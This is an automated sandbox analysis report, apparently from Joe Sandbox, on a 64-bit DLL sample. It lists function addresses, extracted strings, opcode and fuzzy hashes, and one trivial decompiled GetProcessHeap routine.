Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: {?
API String ID: 0-3906500937
Opcode ID: 2d540e23551ce5f958f4764bec98e9519d494356363efa56796c0522d6c48830
Instruction ID: 7643702d073ff4940ecce4f9a509df35797120a70f9b1d87fbff4b68fa84022d
Opcode Fuzzy Hash: 2d540e23551ce5f958f4764bec98e9519d494356363efa56796c0522d6c48830
Instruction Fuzzy Hash: 90B157B590070DCFEB98CF68C18A9DD3BA9FB15358F404129FC0E96290D7B9E919CB52

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000871C Relevance: 1.4, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

Rg, xrefs: 00000001800089A3

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Rg
API String ID: 0-444783058
Opcode ID: 062f6907516fb83770376f4ae06b90337ece7bd6ef9ef592e7bb1771c5ef6bb2
Instruction ID: de0b65e82f7df1f72d442b51ab019ddee83380224b4c4f084cb2c80ee98f37ca
Opcode Fuzzy Hash: 062f6907516fb83770376f4ae06b90337ece7bd6ef9ef592e7bb1771c5ef6bb2
Instruction Fuzzy Hash: 9A91087150424D8BEF48CF68C88A6DE3FF0FB18398F255219E84AA6290D778D654CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001D32C Relevance: 1.4, Strings: 1, Instructions: 182COMMON

Download Yara Rule

Strings

RC/, xrefs: 000000018001D40F

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: RC/
API String ID: 0-1672839029
Opcode ID: cd45515637f1f2b16c20ca83177dd82b64ca54d483ea71e032997c7aebad3db9
Instruction ID: 3bbf9db0e9f1f1cd2f3806796f1fd845787a3905c9f06ecb1b9c11751c7e15f2
Opcode Fuzzy Hash: cd45515637f1f2b16c20ca83177dd82b64ca54d483ea71e032997c7aebad3db9
Instruction Fuzzy Hash: 7291FA7150468DABDBBACF28DC9A7D937A0FB48344F90811AD90E8F290DF745B49DB41

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000AE84 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

XU, xrefs: 000000018000AFE4

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: XU
API String ID: 0-683303128
Opcode ID: e071b3a0d50c9461b57229d15226e783a6e60c7e98d42caa5a907250e51fd640
Instruction ID: 425e58cadb221d331942f6c121d336e4e4e9b3bb556196463e5803c943499b9b
Opcode Fuzzy Hash: e071b3a0d50c9461b57229d15226e783a6e60c7e98d42caa5a907250e51fd640
Instruction Fuzzy Hash: 10613B70D14608DBEB9CDFA4E8896DDBBB1FB48344F10812DE816E72A1DB749A49CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009298 Relevance: 1.4, Strings: 1, Instructions: 144COMMON

Download Yara Rule

Strings

F'K, xrefs: 00000001800094BB

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: F'K
API String ID: 0-2963079709
Opcode ID: 713e8163358f3e4ccf3a322240c7036fe92718bea1a19a215dd26039f06aebda
Instruction ID: 3cdbfef3d71ad5117e50a41d4a808b16c297a78b625f2c46d5022480677e20ff
Opcode Fuzzy Hash: 713e8163358f3e4ccf3a322240c7036fe92718bea1a19a215dd26039f06aebda
Instruction Fuzzy Hash: C481A5749043888BDBB9DF68C8897DDBBB0FB48348F20411EDC5AAB291DBB45685CF41

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001C974 Relevance: 1.4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

Strings

Gh, xrefs: 000000018001CB06

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Gh
API String ID: 0-277699601
Opcode ID: 7940fb094068dd5baf5e4535b0b949c1577390b24490b32456d4c9773adc2951
Instruction ID: 49f89991b7669aef05847bf6ac8085ae3f2e5bccc0c70176600d3bb48f89c730
Opcode Fuzzy Hash: 7940fb094068dd5baf5e4535b0b949c1577390b24490b32456d4c9773adc2951
Instruction Fuzzy Hash: A2512670614B48ABDBC9DE28C4C669D3FE1FB483A8FA06028FC4786295D774D4C5CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001660 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

KdW, xrefs: 000000018000170C

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: KdW
API String ID: 0-1553299040
Opcode ID: 3dbde57a559d0e97d3426f0fe397d2413bb4c768266781bd1ea48c4852796dec
Instruction ID: 07466cbb68b99a3b5ba183136cc33729b20d4f14bf8bba25a53fc7287070b877
Opcode Fuzzy Hash: 3dbde57a559d0e97d3426f0fe397d2413bb4c768266781bd1ea48c4852796dec
Instruction Fuzzy Hash: 17619EB090074A8BDF48CF28C49A59E7FB1FB68398F60421DFC5696290D374DAA5CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001364 Relevance: 1.4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

5, xrefs: 00000001800014BD

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 5
API String ID: 0-2458008916
Opcode ID: 3e00d75dc5af6ed95834cd7e36aa8dd6f7dfadaf5872006e22b3d5cd376261b0
Instruction ID: a26923ab85f7e808caed84009aa606e64988cd015e626ed89f9c8f152d3751bb
Opcode Fuzzy Hash: 3e00d75dc5af6ed95834cd7e36aa8dd6f7dfadaf5872006e22b3d5cd376261b0
Instruction Fuzzy Hash: FD51BEB090074E8BDB48CF64C88B5DE7FB0FB68398F20421DEC5696294D3B496A5CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180024098 Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

>, xrefs: 000000018002413F

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: >
API String ID: 0-260571596
Opcode ID: 52da228a42332ba98b714843feb8a4ffa7a865caa0d47f3da51bcc1adbe3605a
Instruction ID: 46fc6c4e0ac0a664899e95d82bf5bf8fb1e46c637e697bbd607199efc3ac47d3
Opcode Fuzzy Hash: 52da228a42332ba98b714843feb8a4ffa7a865caa0d47f3da51bcc1adbe3605a
Instruction Fuzzy Hash: E351187090070E8FDF48DF68C48A5DE7FB0FB58398F255219E80AA6260C7789695CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180018D0C Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

e#y, xrefs: 0000000180018DF8

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: e#y
API String ID: 0-1553523250
Opcode ID: 7cfc1742122b5da270b1305c98699770b0d8300b0d29b437b0f5bbbb71ff1cdb
Instruction ID: 8922a9c917ecf92f84784f2c0912e7afb41abd4682f2986cf207ea24a7e27a88
Opcode Fuzzy Hash: 7cfc1742122b5da270b1305c98699770b0d8300b0d29b437b0f5bbbb71ff1cdb
Instruction Fuzzy Hash: 4451C0B090034A8BDB48DF24C49A4DE7FB1BB68394F60461DEC56AA290D37896A5CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002748C Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

;Qe+, xrefs: 0000000180027515

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ;Qe+
API String ID: 0-3743842969
Opcode ID: abc73cde212dc252b0e5d03e266be842b85d1299fa2b3d615a0caa319cbc98b6
Instruction ID: 2891cc472bdff435687e8dc78c7f584053815dc88c3a0ad3e69441950bb252b7
Opcode Fuzzy Hash: abc73cde212dc252b0e5d03e266be842b85d1299fa2b3d615a0caa319cbc98b6
Instruction Fuzzy Hash: FB51B3B190074A8BDB48CF68C49A5DE7FB0BB68398F114229EC5696250D374DAA5CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800069C0 Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

,', xrefs: 0000000180006AFA

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ,'
API String ID: 0-3722628154
Opcode ID: fb5c24a2de7b785ef7d1522db3a7cd1fc0c6d32909dcdfd4e7ef4007326c169e
Instruction ID: 8bcc0ae8ca8a44d8cc4a64df71be4da37ed53fd059e3607e1506b6ed9a83d4bd
Opcode Fuzzy Hash: fb5c24a2de7b785ef7d1522db3a7cd1fc0c6d32909dcdfd4e7ef4007326c169e
Instruction Fuzzy Hash: 9C51E3B091074A8FDB48CF68C9865DE7FB0FB68394F10421DEC5AA6290D37496A5CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000F174 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

;qct, xrefs: 000000018000F2B3

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ;qct
API String ID: 0-1256533914
Opcode ID: 7e5896647748426d00c93f1e327efcd977346de81977c4c15da4b7b9c787c365
Instruction ID: 5c1d59b2199d0d85db2571b197c7ca3ede17e59358e5629c23b069c973ffe58b
Opcode Fuzzy Hash: 7e5896647748426d00c93f1e327efcd977346de81977c4c15da4b7b9c787c365
Instruction Fuzzy Hash: B741E27051078D8BDB49CF68C88A4DE7BA0FB4835CF155619FC8AA6260D3B8D585CF89

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009BEC Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

%[, xrefs: 0000000180009CD2

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: %[
API String ID: 0-3862537531
Opcode ID: f1dc08e8e3e3301475fb70ff4cfa84bb86d735aa649ff25d3a10773117e6cde7
Instruction ID: 6a4ad4b0db03769040014b30bff45f2a66b5b8118bf8a9f7d20fa3eb207c29ac
Opcode Fuzzy Hash: f1dc08e8e3e3301475fb70ff4cfa84bb86d735aa649ff25d3a10773117e6cde7
Instruction Fuzzy Hash: 6E31D6B150478A8BDB4CDF68D8565AE3BB1FB48304F004A2DFD26DB390D7B49624CB94

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002629C Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

Wn, xrefs: 00000001800263A2

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Wn
API String ID: 0-506041651
Opcode ID: 571cac09fbe3685261a59c499fbd8c80fdf8cf6d47964e918e1805a2c447958a
Instruction ID: 81acd842a4d7b99bb8f16045e05b91d2bb3390d65dcb5750e05b0634c9df5c42
Opcode Fuzzy Hash: 571cac09fbe3685261a59c499fbd8c80fdf8cf6d47964e918e1805a2c447958a
Instruction Fuzzy Hash: 5F41D4B050078A8FDF48CF68D89A5DE7BB1FB48348F104A2CEC6696290D3B4D664CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002834 Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

"p, xrefs: 00000001800028A3

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: "p
API String ID: 0-3060671971
Opcode ID: ae29b2ab0911a73132ecede333d1ad00ec6016c3b77c06c2e3197b8238caa4ac
Instruction ID: 6d64e93883db61d95f36b7a5a375b7ada03e85890cb65b9286afd9a0e7997e4a
Opcode Fuzzy Hash: ae29b2ab0911a73132ecede333d1ad00ec6016c3b77c06c2e3197b8238caa4ac
Instruction Fuzzy Hash: 42317EB190438E8FDB48DF68D85A5AE3BA0FB48344F014A1DEC269B354D7B4D664CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007694 Relevance: 1.3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

3k^), xrefs: 00000001800076E9

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 3k^)
API String ID: 0-3788653604
Opcode ID: bb4a256fcbfa579ec56a1ee2ed7beb19ee26f98eb9724182ed08b84c2a93462e
Instruction ID: 9f8dcddef577f6809e8fc1cb2f7e992fa0b5e1cd21e70ff7818dd4bfba9124f9
Opcode Fuzzy Hash: bb4a256fcbfa579ec56a1ee2ed7beb19ee26f98eb9724182ed08b84c2a93462e
Instruction Fuzzy Hash: B7417FB090474E8BDB44CF64C48A5CE7FB0FB68398F200619F859A6250D3B8D6A5CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800078B6 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

L>, xrefs: 00000001800078C4

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: L>
API String ID: 0-3698593629
Opcode ID: 4505467bed29688f524a608710bc2007b6739dbdf074f8a934cd9a0936b0c64f
Instruction ID: d89d460aa873d83448a17f0a74045e6cf2e1d6238d53f49acea812bb04bd12ae
Opcode Fuzzy Hash: 4505467bed29688f524a608710bc2007b6739dbdf074f8a934cd9a0936b0c64f
Instruction Fuzzy Hash: C23193716183818BD748DF28D45652ABBE1FB8D30CF504B2DF8CAA7255D738D605CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180018ECC Relevance: 1.3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

Strings

4s, xrefs: 0000000180018F49

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 4s
API String ID: 0-872399246
Opcode ID: 6d87eca2fd37755a10645a04d53ddd8ccaa51cb07cf26575bdb0066d7b11df8f
Instruction ID: eeb76c7ae662c84e9fd1594776157fcd1e0c77f05a4f9c485f3ea2b2cc7d31c8
Opcode Fuzzy Hash: 6d87eca2fd37755a10645a04d53ddd8ccaa51cb07cf26575bdb0066d7b11df8f
Instruction Fuzzy Hash: 314181B090474A8FDB48CF64D48A5DF7FB0FB68398F200519E859A62A0D378D6A4CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000BD00 Relevance: 1.3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

&', xrefs: 000000018000BDEC

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: &'
API String ID: 0-655172784
Opcode ID: 350a21f38a3fdb5f3133185a05ab1b6e8489f4d150297426f8e9146ad85da26a
Instruction ID: e60b1eca4cd057e5464165fc71d6e00ca11e6494182570a2c7a3ee484fb5e5db
Opcode Fuzzy Hash: 350a21f38a3fdb5f3133185a05ab1b6e8489f4d150297426f8e9146ad85da26a
Instruction Fuzzy Hash: DE3179755083818BD348DF28C55641ABBE1BBCC35CF805B2DE4CAAB3A4D778D605CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005590 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

`, xrefs: 0000000180005640

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: `
API String ID: 0-1850852036
Opcode ID: 1919c1110502d15319449504d6e91b7fa88324414ab81abcf7b1c29e64ecc28d
Instruction ID: 12f27fef96dc8894754dd231533b976fb372cf9f09be1d3cddb09b50d4677c93
Opcode Fuzzy Hash: 1919c1110502d15319449504d6e91b7fa88324414ab81abcf7b1c29e64ecc28d
Instruction Fuzzy Hash: 2221267065DB449FE388DF29C48961BBAE1FBD8340F905A1EF885C2360C734D845CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000C364 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

BsL, xrefs: 000000018000C40D

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: BsL
API String ID: 0-590970710
Opcode ID: 4c7ca18370d47a9c2cceab002f43e00c4595808ca112b21f17e8f3d7773031d4
Instruction ID: bf3e705d0a3e127a6b239d821588e89859f67f6db20862a07d3c8d6d25b0e04a
Opcode Fuzzy Hash: 4c7ca18370d47a9c2cceab002f43e00c4595808ca112b21f17e8f3d7773031d4
Instruction Fuzzy Hash: 41317DB1529780AFD3C8DF28C48691BBBE0FB89314F816A2DF9C586260D374D455CF02

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001CCC Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

ZR, xrefs: 0000000180001DEC

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ZR
API String ID: 0-4130514108
Opcode ID: 6cbb8a842fd3cc15b819203d482a3a3b46369313eab12406f6265ee7f7ea0382
Instruction ID: b13af9977396cc860318babd94d7947ade869d3bdb5f1587fd609083ec60b6d4
Opcode Fuzzy Hash: 6cbb8a842fd3cc15b819203d482a3a3b46369313eab12406f6265ee7f7ea0382
Instruction Fuzzy Hash: 0B316EB052D780AFD388DF28C49691ABBE1FBC5315F806A1DF9968B350D774D445CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005478 Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

%F, xrefs: 0000000180005566

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: %F
API String ID: 0-915744445
Opcode ID: cf4e8b82da0d821891615694ed2d7715b09984878493b04af082e458cdddcb63
Instruction ID: f3632c01bd7492b9d648e83c8b8289f5be8476ad9f7b0aa526bfe9f17a615d29
Opcode Fuzzy Hash: cf4e8b82da0d821891615694ed2d7715b09984878493b04af082e458cdddcb63
Instruction Fuzzy Hash: A1317AB15087809BD348DF28D44A45ABBE1BB9C31CF414B1DF4CAAB254D3B9D608CF0A

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000E708 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

>, xrefs: 000000018000E80A

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: >
API String ID: 0-1166260821
Opcode ID: 7fdb2c55224cd27c72bb618ee64ca03bed07baaed02b8a8707ebf8ca8fbe557d
Instruction ID: a3d582c264d7a48cbd0e974e941d71c0af5034fa157bb054186120ff964f1b5c
Opcode Fuzzy Hash: 7fdb2c55224cd27c72bb618ee64ca03bed07baaed02b8a8707ebf8ca8fbe557d
Instruction Fuzzy Hash: 4F316BB55083808FD788DF28D45941ABBE0BB9C358F404B2DF4CAA72A1D778DA45CF0A

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009D24 Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

-, xrefs: 0000000180009D48

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: -
API String ID: 0-524432557
Opcode ID: ab6574b7591fa644ef4a174e0089e3a7f2dde0b4bdacdeb17973816cbe5b2230
Instruction ID: 2743ae798d84361f3c47c0844efe4056bc1e573d44da25ce9fa5af028cbcbbd6
Opcode Fuzzy Hash: ab6574b7591fa644ef4a174e0089e3a7f2dde0b4bdacdeb17973816cbe5b2230
Instruction Fuzzy Hash: E22160B152D780AFD388DF29D18991BBBE0BB85344F806E1DF8C68B250D7B5D845CB46

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180018560 Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

9D, xrefs: 00000001800185F7

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 9D
API String ID: 0-1055660748
Opcode ID: 7e3a213964b2efcfd3778a88dd8b399f98e251b5205d52f3c39e35f889fd4133
Instruction ID: 2b980fabc4745c60efad4018d3cdf33bc582eba9e1b676cceb4e0857b73aa84d
Opcode Fuzzy Hash: 7e3a213964b2efcfd3778a88dd8b399f98e251b5205d52f3c39e35f889fd4133
Instruction Fuzzy Hash: 6C2179B450C3858BD348DF28D14A51ABBE0BB9C70CF400B5DF8CAAB254D778D644CB0A

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180022A84 Relevance: 1.3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

Strings

]i, xrefs: 0000000180022A88

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ]i
API String ID: 0-2057496602
Opcode ID: 986d758f6ca8ef85e847a0378ae5df520f089d8d24386f824cd21791a7bd6731
Instruction ID: 4a116e0a0ac8943674a44645b40dd0a83197eee35043817acb7aa81aadce2f0a
Opcode Fuzzy Hash: 986d758f6ca8ef85e847a0378ae5df520f089d8d24386f824cd21791a7bd6731
Instruction Fuzzy Hash: 492154B45087858BD398DF28D48A50AFBE0BB9C318F400B1DF4C9A62A4D77DDA45CB0A

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001B5C Relevance: 1.3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

Strings

x{, xrefs: 0000000180001BB9

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: x{
API String ID: 0-1642613173
Opcode ID: 63a3ae9201259adcdbe27aaae2969a84c8f8b5356c3378407a4e6cf7a642a0a4
Instruction ID: cfab1a828be9d4f11d62def22584f191cf8c0c6105b21f987aeed96694dfa2d1
Opcode Fuzzy Hash: 63a3ae9201259adcdbe27aaae2969a84c8f8b5356c3378407a4e6cf7a642a0a4
Instruction Fuzzy Hash: 992126B55097849BE348DF28C08A51BBBE1BB9C31CF810B1DF4CAA7254D378D649CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6DD90 Relevance: 1.3, APIs: 1, Instructions: 7
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FFA7FFA0AE6DD90(long long __rax) {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0xaedf930 = __rax;
				return _t3 & 0xffffff00 | __rax != 0x00000000;
			}

0x7ffa0ae6dd94
0x7ffa0ae6dd9d
0x7ffa0ae6ddab

APIs

GetProcessHeap.KERNEL32 ref: 00007FFA0AE6DD94

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: d636a00b42bd7fb21fd81f09ca247f2baf2d4d4e689b7af4b01eea6171bd139b
Instruction ID: 0ba718a17d9d79e74209febb62ff9696a1191a102e4ee7f54ac18ea0c5f74d92
Opcode Fuzzy Hash: d636a00b42bd7fb21fd81f09ca247f2baf2d4d4e689b7af4b01eea6171bd139b
Instruction Fuzzy Hash: AAB09221E17B12C2EA087B75BC8221422A47F4AB00F8880B8C50E40330EF3C20BA9700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180015694 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 242dba147a3b42ea0af5cfec930ece5e83433d0fba20fb6d2f2fe3008541b1f6
Instruction ID: acc53311729b3702271ddd4d27c6e114e7717bdbebfd3a0864e34ca081a3005a
Opcode Fuzzy Hash: 242dba147a3b42ea0af5cfec930ece5e83433d0fba20fb6d2f2fe3008541b1f6
